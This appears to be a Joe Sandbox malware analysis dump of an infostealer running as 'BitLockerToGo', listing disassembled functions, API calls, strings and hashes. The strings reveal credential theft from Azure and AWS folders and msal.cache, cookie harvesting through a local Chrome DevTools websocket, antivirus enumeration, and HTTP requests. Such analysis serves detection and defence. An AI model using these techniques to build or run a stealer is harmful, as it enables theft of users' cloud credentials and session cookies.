                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F7D20: FindNextFileA.KERNEL32(?,?), ref: 008F804E
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F7D20: FindClose.KERNEL32(?), ref: 008F8062
                                                                                                                                                                                                                                                                                                                    • _memset.LIBCMT ref: 008F8319
                                                                                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,00000000), ref: 008F833B
                                                                                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,\.IdentityService\), ref: 008F8358
                                                                                                                                                                                                                                                                                                                    • _memset.LIBCMT ref: 008F838D
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2669758364.00000000008E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669857775.0000000000911000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000091E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000944000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000096D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000097F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000982000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000988000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.00000000009C6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000A7A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000B21000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2670751344.0000000000B33000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_8e0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: lstrcat$File_memsetwsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                                                                                                                                                                                                                                                                                                    • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                                                                                                                                                                                                                                                                                                    • API String ID: 780282842-974132213
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 5dcf0b306c76510aa9bfcb77e2e8a02f4626a428d1e9f50d7bcaad6f01d00c7e
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 37a981da04b1daa86b66726be7d81ff0724804d608d3763246a7a2b27414bffb
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5dcf0b306c76510aa9bfcb77e2e8a02f4626a428d1e9f50d7bcaad6f01d00c7e
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D8419171E8421C6ADB24FBA4EC4BFEDB37CFB45704F440494B604E3195DAB49A848B91
                                                                                                                                                                                                                                                                                                                    Function 008EBB2E Relevance: 33.3, APIs: 22, Instructions: 315stringmemoryfileCOMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2143: lstrcpy.KERNEL32(00000000,00000000), ref: 008F2169
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F38A6: GetSystemTime.KERNEL32(?,00917807,?), ref: 008F38D5
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2265: lstrlen.KERNEL32(?,?,?,008F8FD9,abc_,00000000,00917786,?,?,?,?,008F9D6E), ref: 008F2279
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2265: lstrcpy.KERNEL32(00000000,?), ref: 008F22A1
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2265: lstrcat.KERNEL32(?,00000000), ref: 008F22AC
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2223: lstrcpy.KERNEL32(00000000,?), ref: 008F2251
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2223: lstrcat.KERNEL32(?,?), ref: 008F225B
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F21E9: lstrcpy.KERNEL32(00000000,?), ref: 008F2219
                                                                                                                                                                                                                                                                                                                    • CopyFileA.KERNEL32(?,?,00000001), ref: 008EBBD3
                                                                                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 008EBCDD
                                                                                                                                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 008EBCE4
                                                                                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,009185A4,00000000), ref: 008EBD95
                                                                                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,009185A8), ref: 008EBDBD
                                                                                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(00000000,?), ref: 008EBDE1
                                                                                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(00000000,009185AC), ref: 008EBDED
                                                                                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(00000000,?), ref: 008EBDF7
                                                                                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(00000000,009185B0), ref: 008EBE03
                                                                                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(00000000,?), ref: 008EBE0D
                                                                                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(00000000,009185B4), ref: 008EBE19
                                                                                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(00000000,?), ref: 008EBE23
                                                                                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(00000000,009185B8), ref: 008EBE2F
                                                                                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(00000000,?), ref: 008EBE39
                                                                                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(00000000,009185BC), ref: 008EBE45
                                                                                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(00000000,?), ref: 008EBE4F
                                                                                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(00000000,009185C0), ref: 008EBE5B
                                                                                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(00000000,?), ref: 008EBE65
                                                                                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(00000000,009185C4), ref: 008EBE71
                                                                                                                                                                                                                                                                                                                    • lstrlen.KERNEL32(00000000), ref: 008EBEC3
                                                                                                                                                                                                                                                                                                                    • lstrlen.KERNEL32(?), ref: 008EBEDE
                                                                                                                                                                                                                                                                                                                    • DeleteFileA.KERNEL32(?), ref: 008EBF21
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2669758364.00000000008E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669857775.0000000000911000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000091E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000944000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000096D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000097F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000982000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000988000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.00000000009C6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000A7A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000B21000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2670751344.0000000000B33000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_8e0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 1956182324-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: b8d9b6494b7cef3b521706f756d7f8888fdd7672120e3152c9e254c4f1e662e6
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 6db0a7e14c3eaca04892a893d8eb79bbf8f8e4a0c47b466c5c1f6c289d4c5fab
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b8d9b6494b7cef3b521706f756d7f8888fdd7672120e3152c9e254c4f1e662e6
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 47C10532904108ABDF11BBA9ED4A8EE7B79FF05701F210425FA01F3162DF716E569B91
                                                                                                                                                                                                                                                                                                                    Function 008F52CC Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 278stringCOMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • strtok_s.MSVCRT ref: 008F5317
                                                                                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,true), ref: 008F53D9
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F21A5: lstrlen.KERNEL32(?,?,008F9098,009177FE,00917787,?,?,?,?,008F9D6E), ref: 008F21AB
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F21A5: lstrcpy.KERNEL32(00000000,00000000), ref: 008F21DD
                                                                                                                                                                                                                                                                                                                    • lstrcpy.KERNEL32(?,?), ref: 008F549B
                                                                                                                                                                                                                                                                                                                    • lstrcpy.KERNEL32(?,00000000), ref: 008F54CB
                                                                                                                                                                                                                                                                                                                    • lstrcpy.KERNEL32(?,00000000), ref: 008F5506
                                                                                                                                                                                                                                                                                                                    • lstrcpy.KERNEL32(?,00000000), ref: 008F5541
                                                                                                                                                                                                                                                                                                                    • lstrcpy.KERNEL32(?,00000000), ref: 008F557C
                                                                                                                                                                                                                                                                                                                    • lstrcpy.KERNEL32(?,00000000), ref: 008F55B7
                                                                                                                                                                                                                                                                                                                    • strtok_s.MSVCRT ref: 008F56CB
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2669758364.00000000008E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669857775.0000000000911000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000091E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000944000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000096D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000097F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000982000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000988000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.00000000009C6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000A7A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000B21000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2670751344.0000000000B33000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_8e0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: lstrcpy$strtok_s$lstrlen
                                                                                                                                                                                                                                                                                                                    • String ID: false$true
                                                                                                                                                                                                                                                                                                                    • API String ID: 2116072422-2658103896
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 949201177b95adeaa8828183edef28686c55f0e616f3e4f9c7e07095fba8417a
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 58e0d297456022b37dd0309d684740141f942bf1e677fd8e0ae45eb0a544e3ba
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 949201177b95adeaa8828183edef28686c55f0e616f3e4f9c7e07095fba8417a
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F8B1397590421CABDB64EB28DC89AE973B8FB18300F1005E5E649E7262DF71AF858F51
                                                                                                                                                                                                                                                                                                                    Function 008E8B39 Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 177stringCOMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E7E0E: InternetOpenA.WININET(WebSocketClient,00000001,00000000,00000000,00000000), ref: 008E7E3C
                                                                                                                                                                                                                                                                                                                    • _memset.LIBCMT ref: 008E8C21
                                                                                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,ws://localhost:9223), ref: 008E8C3B
                                                                                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,00000000), ref: 008E8C5A
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F045E: _memmove.LIBCMT ref: 008F0478
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2669758364.00000000008E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669857775.0000000000911000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000091E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000944000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000096D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000097F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000982000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000988000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.00000000009C6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000A7A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000B21000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2670751344.0000000000B33000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_8e0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: lstrcat$InternetOpen_memmove_memset
                                                                                                                                                                                                                                                                                                                    • String ID: .txt$/devtools$Cookies$localhost$ws://localhost:9223
                                                                                                                                                                                                                                                                                                                    • API String ID: 216805803-4155744131
                                                                                                                                                                                                                                                                                                                    • Opcode ID: df808ebf17490b4419ab7d326c63cdfb4a989d980ab852148e6ce550ed5faa75
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 746416756147422560c295ef0f694a5a662a65155aa54433e57d3f20f7299644
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: df808ebf17490b4419ab7d326c63cdfb4a989d980ab852148e6ce550ed5faa75
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 51611C71D0462CAECB20EB69DD46BEAB7B8FB49706F4044D5A608E3181DA709BC5CF51
                                                                                                                                                                                                                                                                                                                    Function 008E515F Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 161networkmemoryfileCOMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2175: lstrcpy.KERNEL32(00000000,?), ref: 008F2194
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E49DE: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 008E4A10
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E49DE: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 008E4A16
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E49DE: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 008E4A1C
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E49DE: lstrlen.KERNEL32(000000FF,00000000,?), ref: 008E4A2E
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E49DE: InternetCrackUrlA.WININET(000000FF,00000000), ref: 008E4A36
                                                                                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 008E51A6
                                                                                                                                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 008E51AD
                                                                                                                                                                                                                                                                                                                    • InternetOpenA.WININET(?,00000000,00000000,00000000,00000000), ref: 008E51CF
                                                                                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?), ref: 008E51E9
                                                                                                                                                                                                                                                                                                                    • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 008E5219
                                                                                                                                                                                                                                                                                                                    • HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 008E5258
                                                                                                                                                                                                                                                                                                                    • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 008E5288
                                                                                                                                                                                                                                                                                                                    • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 008E5293
                                                                                                                                                                                                                                                                                                                    • HttpQueryInfoA.WININET(?,00000013,?,?,00000000), ref: 008E52BC
                                                                                                                                                                                                                                                                                                                    • InternetReadFile.WININET(?,?,00000400,?), ref: 008E5302
                                                                                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(?), ref: 008E5361
                                                                                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(?), ref: 008E536D
                                                                                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(?), ref: 008E5379
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2669758364.00000000008E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669857775.0000000000911000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000091E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000944000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000096D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000097F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000982000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000988000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.00000000009C6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000A7A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000B21000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2670751344.0000000000B33000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_8e0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: Internet$CloseHandleHttp$HeapOpenRequest$AllocateConnectCrackFileInfoOptionProcessQueryReadSendlstrcpylstrlen
                                                                                                                                                                                                                                                                                                                    • String ID: GET
                                                                                                                                                                                                                                                                                                                    • API String ID: 442264750-1805413626
                                                                                                                                                                                                                                                                                                                    • Opcode ID: da2419623c79619b50b15a1c285ffb995a7c2bab2534aed7733a6134afed8032
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 930137bab519c5c7edfb03f06ad019e82bd4b852fbb1f5d4d28ea4fbc7c8c782
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: da2419623c79619b50b15a1c285ffb995a7c2bab2534aed7733a6134afed8032
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2D51F57190092CAFDB209F65DC85BEFBBB8FB09346F0440A5BA09E3251DA715F918F91
                                                                                                                                                                                                                                                                                                                    Function 008F35F3 Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 114comCOMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • __EH_prolog3_catch.LIBCMT ref: 008F35FA
                                                                                                                                                                                                                                                                                                                    • CoInitializeEx.COMBASE(00000000,00000000), ref: 008F3609
                                                                                                                                                                                                                                                                                                                    • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 008F361A
                                                                                                                                                                                                                                                                                                                    • CoCreateInstance.COMBASE(00913F70,00000000,00000001,00913EA0,?), ref: 008F3634
                                                                                                                                                                                                                                                                                                                    • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 008F366A
                                                                                                                                                                                                                                                                                                                    • VariantInit.OLEAUT32(?), ref: 008F36B9
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F399E: LocalAlloc.KERNEL32(00000040,00000005,?,?,008F36DC,?), ref: 008F39A6
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F399E: CharToOemW.USER32(?,00000000), ref: 008F39B2
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2143: lstrcpy.KERNEL32(00000000,00000000), ref: 008F2169
                                                                                                                                                                                                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 008F36E7
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2669758364.00000000008E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669857775.0000000000911000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000091E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000944000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000096D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000097F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000982000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000988000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.00000000009C6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000A7A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000B21000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2670751344.0000000000B33000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_8e0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: InitializeVariant$AllocBlanketCharClearCreateH_prolog3_catchInitInstanceLocalProxySecuritylstrcpy
                                                                                                                                                                                                                                                                                                                    • String ID: Select * From AntiVirusProduct$Unknown$Unknown$Unknown$WQL$displayName$root\SecurityCenter2
                                                                                                                                                                                                                                                                                                                    • API String ID: 4288110179-315474579
                                                                                                                                                                                                                                                                                                                    • Opcode ID: aeb2c5211416a93ce3913d077f3074ba047702b632b2f1ed13a562160f0a0e6a
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 91b01f208c12523ac27bc47c4cc764b319e202e81834b220155f1d67858c1c61
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: aeb2c5211416a93ce3913d077f3074ba047702b632b2f1ed13a562160f0a0e6a
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A7313B71B0424ABBDB10ABA5CC49EEFBB79FFC5B14F104509F211E62A0D7B59A41CB20
                                                                                                                                                                                                                                                                                                                    Function 008E1274 Relevance: 24.1, APIs: 16, Instructions: 120stringCOMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • _memset.LIBCMT ref: 008E1297
                                                                                                                                                                                                                                                                                                                    • _memset.LIBCMT ref: 008E12A6
                                                                                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,0091BC0C), ref: 008E12C0
                                                                                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,0091BC10), ref: 008E12CE
                                                                                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,0091BC14), ref: 008E12DC
                                                                                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,0091BC18), ref: 008E12EA
                                                                                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,0091BC1C), ref: 008E12F8
                                                                                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,0091BC20), ref: 008E1306
                                                                                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,0091BC24), ref: 008E1314
                                                                                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,0091BC28), ref: 008E1322
